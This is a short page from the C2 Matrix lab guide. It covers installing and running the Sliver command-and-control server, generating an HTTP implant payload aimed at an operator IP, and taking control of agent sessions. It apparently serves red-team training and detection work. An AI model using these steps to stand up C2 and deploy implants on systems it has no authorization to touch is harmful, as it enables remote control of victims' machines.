C2 Matrix
  • The C2 Matrix
  • About
  • SANS Slingshot C2 Matrix VM
  • Contribute
  • Feedback
  • Lab Infrastructure
    • C2 Matrix Eval Lab
    • Basic Lab
    • Virtual Machines with C2s
    • Docker
    • Resources
  • C2
    • Caldera
    • Covenant
    • Deimos
    • Empire3
    • Empire5
    • Havoc
    • ibombshell
    • Koadic
    • Merlin
    • Mythic
    • Nuages
    • PoshC2
    • PowerHub
    • SilentTrinity
    • Sliver
    • SCYTHE
    • TrevorC2
  • Attack Infrastructure
    • Resources
    • Redirectors/Relays
  • Detection
    • Basics
    • Beacons
    • JA3/JA3S Hashes
    • JARM
Powered by GitBook
On this page
  • Install Sliver
  • Run Sliver
  • Generate Payload
  • Interact with Agent

Was this helpful?

  1. C2

Sliver

PreviousSilentTrinityNextSCYTHE

Last updated 2 years ago

Was this helpful?

Install Sliver

Grab the URL for the latest release at

mkdir /opt/sliver
cd /opt/sliver
wget <URL>
chmod +x sliver-server_linux

Run Sliver

sudo /opt/sliver/sliver-server_linux

Generate Payload

generate --http <IP>
http

Interact with Agent

sessions
use <tab>
https://github.com/BishopFox/sliver/releases/